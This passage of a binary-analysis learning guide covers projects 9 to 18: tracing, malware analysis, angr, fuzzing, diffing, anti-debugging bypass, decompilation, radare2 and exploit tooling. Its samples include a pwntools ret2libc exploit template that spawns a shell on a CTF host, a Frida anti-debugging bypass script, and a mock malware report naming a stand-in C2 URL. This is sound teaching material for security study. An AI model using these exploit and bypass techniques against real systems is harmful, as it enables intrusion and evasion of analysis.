fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = -1               # Password revealed!
puts("Wrong!")

Implementation Hints:

Useful strace options:

strace -f          # Follow child processes
strace -e open     # Only trace open() calls
strace -e file     # All file-related calls
strace -e network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process

Useful ltrace options:

ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Show 2 levels of nesting

Analysis workflow:

Run with strace to see syscalls
Run with ltrace to see library calls
Look for interesting patterns:
- File operations (what does it read/write?)
- Network operations (where does it connect?)
- String comparisons (password checks?)

Learning milestones:

Trace basic program → Understand output format
Find password checks → strcmp/memcmp in ltrace
Trace network activity → socket/connect/send
Analyze malware behavior → Without disassembly

Project 10: Malware Analysis Lab

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Assembly analysis, Python
Alternative Programming Languages: PowerShell (Windows malware)
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 3. The “Service & Support” Model
Difficulty: Level 3: Advanced
Knowledge Area: Malware Analysis / Threat Intelligence
Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges you’ll face:

Safe environment → maps to VMs, network isolation
Behavioral analysis → maps to what does it do when run?
Static analysis → maps to understanding without running
Anti-analysis bypass → maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

Safe Environment Setup: “Practical Malware Analysis” Ch. 2
Behavioral Analysis: “Practical Malware Analysis” Ch. 3
Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced Time estimate: 4-6 weeks Prerequisites: Projects 1-9, strong Windows/Linux knowledge

Real world outcome:

# Malware Analysis Report: suspicious.exe

## Executive Summary
The sample is a credential stealer that exfiltrates browser passwords
to a C2 server at 192.168.1.100:443.

## Static Analysis
- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\\User Data\\Default\\Login Data"
  - "Mozilla\\Firefox\\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis
1. Creates mutex "Global\\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs
- Mutex: Global\\{12345678-1234-...}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\\svchost.exe

## YARA Rule
rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}

Implementation Hints:

Analysis workflow:

Triage: File type, hashes, VirusTotal check
Environment Setup: Isolated VM with snapshots
Behavioral Analysis:
- Process Monitor (Windows) / strace (Linux)
- Network capture (Wireshark, fakenet-ng)
- Registry changes, file system changes
Static Analysis:
- Strings, imports, exports
- Unpack if packed
- Disassemble/decompile key functions
Dynamic Analysis:
- Debug with x64dbg/GDB
- Set breakpoints on interesting APIs
- Dump decrypted data
Report Writing: Document findings with IOCs

Anti-analysis techniques to watch for:

IsDebuggerPresent() checks
Timing checks (RDTSC)
VM detection (CPUID, registry checks)
Anti-disassembly tricks

Learning milestones:

Set up safe lab → Isolated analysis environment
Behavioral analysis → Understand without disassembly
Static analysis → Reverse engineer core functionality
Write reports → Document findings professionally

Project 11: Symbolic Execution with angr

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python
Alternative Programming Languages: None (angr is Python-only)
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 1. The “Resume Gold”
Difficulty: Level 4: Expert
Knowledge Area: Program Analysis / Constraint Solving
Software or Tool: angr framework, Python 3
Main Book: angr documentation

What you’ll build: Use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges you’ll face:

Setting up states → maps to defining where to start
Avoiding path explosion → maps to constraining exploration
Finding target addresses → maps to what state do you want?
Extracting solutions → maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

Symbolic State: angr docs - Core Concepts
Exploration Techniques: angr docs - Simulation
Constraint Solving: Z3 solver basics

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Projects 1-8, Python proficiency

Real world outcome:

import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    print(f"Password: {solution.decode()}")
else:
    print("No solution found")

# Output:
# Password: sup3r_s3cr3t_k3y

Implementation Hints:

angr workflow:

Load binary with angr.Project()
Create symbolic variables with claripy.BVS()
Create initial state with factory.entry_state()
Create simulation manager with factory.simulation_manager()
Explore with simgr.explore(find=..., avoid=...)
Extract solution with solver.eval()

Tips for avoiding path explosion:

Use avoid to skip irrelevant paths
Set memory limits on states
Use hooks to skip complex functions
Start exploration from specific addresses

Common patterns:

# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed

Learning milestones:

Solve simple crackme → Basic symbolic execution
Handle complex inputs → Symbolic arrays
Use hooks → Skip annoying functions
Solve CTF challenges → Real-world application

Project 12: Fuzzing with AFL++

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C (for harnesses), Shell
Alternative Programming Languages: Python (for orchestration)
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 3. The “Service & Support” Model
Difficulty: Level 3: Advanced
Knowledge Area: Vulnerability Discovery / Fuzzing
Software or Tool: AFL++, libFuzzer, Address Sanitizer
Main Book: “The Fuzzing Book” (online)

What you’ll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing is how most modern vulnerabilities are found. Understanding fuzzing means understanding what makes programs crash.

Core challenges you’ll face:

Writing harnesses → maps to calling the target function
Preparing corpus → maps to good starting inputs
Triaging crashes → maps to which crashes are exploitable?
Binary-only fuzzing → maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

Coverage-Guided Fuzzing: AFL++ docs
Sanitizers: LLVM sanitizer docs
Persistent Mode: AFL++ performance docs

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: C programming, Projects 1-3

Real world outcome:

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

# AFL++ output:
#        american fuzzy lop ++4.00c
# ┌─ process timing ─────────────────────────────────────┐
# │        run time : 0 days, 0 hrs, 23 min, 45 sec      │
# │   last new find : 0 days, 0 hrs, 0 min, 12 sec       │
# ├─ overall results ────────────────────────────────────┤
# │  cycles done : 847                                   │
# │ corpus count : 234                                   │
# │saved crashes : 3 (!)                                 │   ← Found bugs!
# │  saved hangs : 0                                     │
# └──────────────────────────────────────────────────────┘

# Triage crashes
$ for crash in out/crashes/*; do
    ./target "$crash" 2>&1 | head -5
done

Implementation Hints:

Writing a harness:

// For AFL++
int main(int argc, char **argv) {
    if (argc < 2) return 1;

    FILE *f = fopen(argv[1], "r");
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}

AFL++ modes:

Source mode: Compile with afl-gcc/afl-clang-fast
QEMU mode: Fuzz binaries without source (-Q flag)
Frida mode: Alternative for binary-only
Persistent mode: Faster fuzzing with loop

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

Fuzz simple target → Find obvious crashes
Write custom harness → Fuzz specific functions
Triage crashes → Determine exploitability
Fuzz binary-only → No source code available

Project 13: Binary Diffing

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python
Alternative Programming Languages: Ghidra scripts
Coolness Level: Level 3: Genuinely Clever
Business Potential: 2. The “Micro-SaaS / Pro Tool”
Difficulty: Level 2: Intermediate
Knowledge Area: Patch Analysis / Vulnerability Research
Software or Tool: BinDiff, Diaphora, Ghidriff
Main Book: N/A (tool documentation)

What you’ll build: Compare two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges you’ll face:

Function matching → maps to identifying same function across versions
Diffing algorithms → maps to graph-based comparison
Finding security patches → maps to what was the vulnerability?
Interpreting results → maps to understanding the change

Resources for key challenges:

Key Concepts:

Function Matching: BinDiff documentation
Graph Isomorphism: Comparison algorithms
Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 5 (Ghidra)

Real world outcome:

# Using ghidriff
$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report

# Output:
# Modified Functions:
#   png_read_IDAT_data (similarity: 0.87)
#     - Added bounds check at 0x1234
#     - New comparison: if (length > max_size)
#
#   png_handle_chunk (similarity: 0.95)
#     - Additional validation in switch statement
#
# New Functions:
#   png_check_chunk_length
#
# Deleted Functions:
#   (none)

# Analysis:
# The patch adds a bounds check in png_read_IDAT_data
# This fixes CVE-2023-XXXX (buffer overflow)
# Vulnerable code: memcpy without size check
# Fixed code: size validated before copy

Implementation Hints:

Binary diffing workflow:

Get old and new versions of binary
Export to BinDiff/Diaphora format
Run the diffing tool
Focus on:
- Modified functions with low similarity
- New validation/bounds check functions
- Changes near memory operations

Tools:

BinDiff: Best for IDA Pro users
Diaphora: Open source, works with IDA
Ghidriff: Works with Ghidra, command-line
Ghidra Version Tracking: Built-in

Identifying security patches:

Look for new if statements (validation)
Look for changes to buffer operations
Look for new error handling
Check functions near strings like “overflow”, “bounds”

Learning milestones:

Diff two versions → Generate comparison report
Identify changed functions → Focus on modifications
Find security patches → Understand what was fixed
Recreate vulnerability → Test on old version

Project 14: Anti-Debugging Bypass

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Assembly, C, Python
Alternative Programming Languages: Frida scripts
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 1. The “Resume Gold”
Difficulty: Level 3: Advanced
Knowledge Area: Anti-Analysis / Evasion
Software or Tool: x64dbg, GDB, Frida
Main Book: “The Art of Mac Malware” by Patrick Wardle

What you’ll build: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

Why it teaches binary analysis: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

Core challenges you’ll face:

Detecting debuggers → maps to IsDebuggerPresent, ptrace, etc.
Timing checks → maps to RDTSC, GetTickCount
VM detection → maps to CPUID, registry checks
Anti-disassembly → maps to opaque predicates, junk bytes

Resources for key challenges:

Key Concepts:

Windows Anti-Debugging: NtQueryInformationProcess, PEB flags
Linux Anti-Debugging: ptrace, /proc/self/status
Timing Attacks: RDTSC, clock differences

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: Projects 4-7, debugger proficiency

Real world outcome:

# Frida script to bypass anti-debugging

import frida

jscode = """
// Bypass IsDebuggerPresent
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writeU64(0);
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)

Implementation Hints:

Common anti-debugging techniques:

Windows:

// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD debugPort;
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger

Linux:

// Technique 1: ptrace self-attach
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged

Bypass approaches:

Patch the check: NOP out the comparison
Hook the API: Return false from IsDebuggerPresent
Modify environment: Clear PEB flag
Use stealth debugger: ScyllaHide, TitanHide

Learning milestones:

Identify techniques → Recognize anti-debugging code
Static bypass → Patch checks in binary
Dynamic bypass → Use hooks/plugins
Write bypasses → Create reusable scripts

Project 15: Build a Decompiler

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python
Alternative Programming Languages: C++, Rust
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 4. The “Open Core” Infrastructure
Difficulty: Level 5: Master
Knowledge Area: Program Analysis / Code Generation
Software or Tool: Your disassembler, LLVM (optional)
Main Book: “Compilers: Principles, Techniques, and Tools” (Dragon Book)

What you’ll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges you’ll face:

Control flow recovery → maps to if/else, loops from jumps
Data flow analysis → maps to variable identification
Type inference → maps to int vs pointer vs struct
Code generation → maps to producing readable output

Resources for key challenges:

Key Concepts:

Control Flow Graphs: “Engineering a Compiler” Ch. 8
SSA Form: “Engineering a Compiler” Ch. 9
Type Recovery: Academic papers on type inference

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects, compiler theory

Real world outcome:

Input (disassembly):
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     [rbp-0x14], edi
    mov     [rbp-0x20], rsi
    cmp     [rbp-0x14], 1
    jle     .fail
    mov     rax, [rbp-0x20]
    mov     rdi, [rax+8]
    call    atoi
    cmp     eax, 0x539
    jne     .fail
    lea     rdi, [success_msg]
    call    puts
    jmp     .end
.fail:
    lea     rdi, [fail_msg]
    call    puts
.end:
    xor     eax, eax
    leave
    ret

Output (decompiled):
    int main(int argc, char **argv) {
        int input;

        if (argc <= 1) {
            puts("Wrong!");
            return 0;
        }

        input = atoi(argv[1]);

        if (input != 1337) {
            puts("Wrong!");
            return 0;
        }

        puts("Correct!");
        return 0;
    }

Implementation Hints:

Decompilation phases:

Disassembly: Convert bytes to instructions
Control Flow Graph: Build graph of basic blocks
Data Flow Analysis: Track value flow through registers
Type Analysis: Infer types from usage
Control Flow Structuring: Convert jumps to if/while
Code Generation: Output C-like code

Control flow structuring algorithms:

If-then-else: Look for diamond patterns
While loops: Back edges in CFG
For loops: Canonical form with counter

Questions to consider:

How do you detect loop vs if-else?
How do you recover variable names?
How do you handle optimized code?
How do you represent structs?

Start simple:

Handle single-block functions
Add if-else handling
Add while loop detection
Add function call recovery
Add type inference

Learning milestones:

Build CFG from assembly → Basic blocks and edges
Detect if-else → Diamond pattern recognition
Detect loops → Back edge identification
Generate readable code → Produce C-like output

Project 16: CTF Binary Exploitation Practice

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python (pwntools)
Alternative Programming Languages: Shell scripting
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 1. The “Resume Gold”
Difficulty: Level 3: Advanced
Knowledge Area: CTF / Competitive Hacking
Software or Tool: pwntools, Docker, CTF platforms
Main Book: “CTF Field Guide” (Trail of Bits)

What you’ll build: Solve 20+ CTF pwn challenges from various difficulty levels, building a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges you’ll face:

Various vulnerability types → maps to stack, heap, format string
Different protections → maps to ASLR, NX, canary, PIE
Time pressure → maps to efficient analysis workflow
Novel techniques → maps to learning new tricks

Resources for key challenges:

pwnable.kr - Beginner to advanced
pwnable.tw - More advanced
ROP Emporium - ROP practice
Nightmare - Comprehensive walkthrough

Key Concepts:

Challenge Categories: CTF101.org
Exploit Primitives: “The Shellcoder’s Handbook”
Advanced Techniques: CTF writeups

Difficulty: Advanced Time estimate: Ongoing (2+ months) Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

Implementation Hints:

Progression path:

Stack challenges: Buffer overflow, ret2win
ROP challenges: ret2libc, ROP chains
Format string: Read/write primitives
Heap challenges: Use-after-free, heap overflow
Advanced: House of Force, tcache poisoning

Build your template library:

leak_libc.py - Standard libc leak pattern
rop_chain.py - ROP chain builder
format_string.py - Format string exploit
heap_exploit.py - Heap exploitation patterns

Practice platforms:

pwnable.kr (beginner-friendly)
ROP Emporium (ROP-focused)
pwnable.tw (advanced)
picoCTF (beginner)

Learning milestones:

Solve 10 stack challenges → Master buffer overflows
Solve 5 ROP challenges → Bypass NX
Solve 5 format string → Arbitrary read/write
Attempt heap challenges → Enter advanced territory

Project 17: radare2 Mastery

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: r2 commands, r2pipe (Python)
Alternative Programming Languages: JavaScript (r2js)
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 1. The “Resume Gold”
Difficulty: Level 2: Intermediate
Knowledge Area: Static Analysis / Command Line RE
Software or Tool: radare2, Cutter (GUI)
Main Book: “The radare2 Book”

What you’ll build: Complete analysis of binaries using only radare2’s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is the most powerful open-source RE framework. Its CLI forces you to think about what you’re doing.

Core challenges you’ll face:

Command syntax → maps to steep learning curve
Navigation → maps to moving through binaries
Visual mode → maps to interactive disassembly
Scripting → maps to r2pipe automation

Resources for key challenges:

Key Concepts:

Command Structure: radare2 book
Visual Mode: V and VV commands
r2pipe: Python bindings documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4

Real world outcome:

$ r2 ./crackme
[0x00401040]> aaa               # Analyze all
[0x00401040]> afl               # List functions
0x00401040    1 43           entry0
0x00401170    4 101          main
0x004011e0    3 67           sym.check_password

[0x00401040]> s main            # Seek to main
[0x00401170]> pdf               # Print disassembly function
            ; CODE XREF from entry0
┌ 101: int main (int argc, char **argv);
│           0x00401170      push rbp
│           0x00401171      mov rbp, rsp
│           0x00401174      sub rsp, 0x40
│           ...
│           0x004011a0      call sym.check_password
│       ┌─< 0x004011a5      test eax, eax
│       │   0x004011a7      je 0x4011b8
│       │   0x004011a9      lea rdi, str.Correct
│       │   0x004011b0      call sym.imp.puts

[0x00401170]> VV                # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdc               # Decompile (with r2ghidra)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')  # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to previous function

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Pseudo-decompile (with plugins)
pdr              # Print function in raw bytes

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
Vp               # Visual panel mode

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
doo              # Reopen for debugging

# Patching
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

aaa; afl - Analyze and list functions
iz; iz~password - Find interesting strings
axt str.password - Find references to string
s ref; pdf - Go to reference, disassemble

Learning milestones:

Basic navigation → Move around binaries
Visual mode → Efficient analysis
Find vulnerabilities → Locate interesting code
Automate with r2pipe → Script your analysis

Project 18: Complete Binary Analysis Toolkit

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python
Alternative Programming Languages: Rust, C
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 4. The “Open Core” Infrastructure
Difficulty: Level 5: Master
Knowledge Area: Tool Development / Complete Framework
Software or Tool: Your previous projects
Main Book: All previous books

What you’ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges you’ll face:

Clean architecture → maps to modular, extensible design
User experience → maps to helpful output, good CLI
Integration → maps to combining all components
Documentation → maps to making it usable

Time estimate: 2-3 months Prerequisites: All previous projects

Real world outcome:

$ binkit analyze ./suspicious
╔══════════════════════════════════════════════════════════════╗
║                    Binary Analysis Report                     ║
╠══════════════════════════════════════════════════════════════╣
║ File:     suspicious                                          ║
║ Format:   ELF64                                               ║
║ Arch:     x86-64                                              ║
║ Compiler: GCC 11.2.0                                          ║
╠══════════════════════════════════════════════════════════════╣
║                       Security                                ║
╠══════════════════════════════════════════════════════════════╣
║ RELRO:        Full RELRO     ✓                               ║
║ Stack Canary: Found          ✓                               ║
║ NX:           Enabled        ✓                               ║
║ PIE:          Enabled        ✓                               ║
║ Fortify:      Enabled        ✓                               ║
╠══════════════════════════════════════════════════════════════╣
║                    Vulnerabilities                            ║
╠══════════════════════════════════════════════════════════════╣
║ ⚠ gets() called at 0x401234 - Buffer overflow risk           ║
║ ⚠ strcpy() called at 0x401456 - No bounds checking           ║
║ ⚠ Format string at 0x401567 - printf(user_input)             ║
╠══════════════════════════════════════════════════════════════╣
║                    Interesting Strings                        ║
╠══════════════════════════════════════════════════════════════╣
║ 0x402000: "/bin/sh"                                           ║
║ 0x402008: "http://c2.evil.com"                                ║
║ 0x402020: "password123"                                       ║
╠══════════════════════════════════════════════════════════════╣
║                      Exploit Template                         ║
╠══════════════════════════════════════════════════════════════╣
║ Generated: exploit_suspicious.py                              ║
║ Target: gets() overflow at 0x401234                          ║
║ Strategy: ROP chain to system("/bin/sh")                     ║
╚══════════════════════════════════════════════════════════════╝

$ binkit disasm 0x401234 20
0x00401234: 48 89 e7              mov rdi, rsp
0x00401237: e8 c4 fe ff ff        call 0x401100 <gets@plt>
0x0040123c: 48 85 c0              test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py

Implementation Hints:

Architecture:

binkit/
├── core/
│   ├── parser.py      # ELF/PE parsing (Project 1-2)
│   ├── disasm.py      # Disassembly (Project 3)
│   └── analyzer.py    # Vulnerability detection
├── exploit/
│   ├── rop.py         # ROP chain builder
│   ├── shellcode.py   # Shellcode generation
│   └── templates/     # Exploit templates
├── output/
│   ├── console.py     # Pretty printing
│   └── report.py      # Report generation
└── cli.py             # Command-line interface

Features to implement:

Auto-detect file format
Security check (like checksec)
Vulnerability scanning
ROP gadget finder
Exploit template generator
Report generation

Learning milestones:

Integrate parsers → Support ELF and PE
Add analysis → Vulnerability detection
Build CLI → User-friendly interface
Generate exploits → Automated template creation

Project Comparison Table

#	Project	Difficulty	Time	Key Skill	Fun
1	ELF Parser	⭐⭐	1-2 weeks	File Formats	⭐⭐⭐
2	PE Parser	⭐⭐	1-2 weeks	Windows Formats	⭐⭐⭐
3	Disassembler	⭐⭐⭐	2-4 weeks	Instruction Encoding	⭐⭐⭐⭐
4	GDB Deep Dive	⭐⭐	1-2 weeks	Debugging	⭐⭐⭐⭐
5	Ghidra RE	⭐⭐	2-3 weeks	Static Analysis	⭐⭐⭐⭐
6	Crackmes	⭐⭐	2-4 weeks	Reverse Engineering	⭐⭐⭐⭐⭐
7	Buffer Overflow	⭐⭐⭐	3-4 weeks	Exploitation	⭐⭐⭐⭐⭐
8	ROP Chains	⭐⭐⭐⭐	2-3 weeks	Advanced Exploitation	⭐⭐⭐⭐⭐
9	strace/ltrace	⭐	3-5 days	Dynamic Analysis	⭐⭐⭐
10	Malware Lab	⭐⭐⭐	4-6 weeks	Malware Analysis	⭐⭐⭐⭐⭐
11	angr	⭐⭐⭐⭐	2-3 weeks	Symbolic Execution	⭐⭐⭐⭐
12	Fuzzing	⭐⭐⭐	2-3 weeks	Vulnerability Discovery	⭐⭐⭐⭐
13	Binary Diffing	⭐⭐	1-2 weeks	Patch Analysis	⭐⭐⭐
14	Anti-Debug Bypass	⭐⭐⭐	2-3 weeks	Anti-Analysis	⭐⭐⭐⭐
15	Decompiler	⭐⭐⭐⭐⭐	2-3 months	Code Recovery	⭐⭐⭐⭐
16	CTF Practice	⭐⭐⭐	Ongoing	Competition Skills	⭐⭐⭐⭐⭐
17	radare2 Mastery	⭐⭐	2-3 weeks	CLI Tools	⭐⭐⭐⭐
18	Complete Toolkit	⭐⭐⭐⭐⭐	2-3 months	Integration	⭐⭐⭐⭐

Recommended Learning Path

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

Project 1: ELF Parser - Understand Linux binaries
Project 2: PE Parser - Understand Windows binaries
Project 4: GDB Deep Dive - Master debugging
Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

Project 5: Ghidra RE - Static analysis
Project 17: radare2 Mastery - CLI analysis
Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

Project 7: Buffer Overflow - Basic exploitation
Project 8: ROP Chains - Bypass protections
Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

Project 10: Malware Lab - Real-world analysis
Project 11: angr - Automated analysis
Project 12: Fuzzing - Vulnerability discovery
Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

Project 3: Disassembler - Deep instruction knowledge
Project 13: Binary Diffing - Patch analysis
Project 15: Decompiler - Code recovery
Project 18: Complete Toolkit - Professional tools

Summary

#	Project	Main Language
1	ELF File Parser	C
2	PE File Parser	C
3	Build a Disassembler	C
4	GDB Debugging Deep Dive	GDB/Python
5	Ghidra Reverse Engineering	Ghidra/Java
6	Crackme Challenges	Assembly/Python
7	Buffer Overflow Exploitation	C/Python
8	Return-Oriented Programming	Python
9	Dynamic Analysis (strace/ltrace)	Shell
10	Malware Analysis Lab	Assembly/Python
11	Symbolic Execution (angr)	Python
12	Fuzzing with AFL++	C/Shell
13	Binary Diffing	Python
14	Anti-Debugging Bypass	Assembly/Python
15	Build a Decompiler	Python
16	CTF Binary Exploitation	Python
17	radare2 Mastery	r2/Python
18	Complete Binary Analysis Toolkit	Python
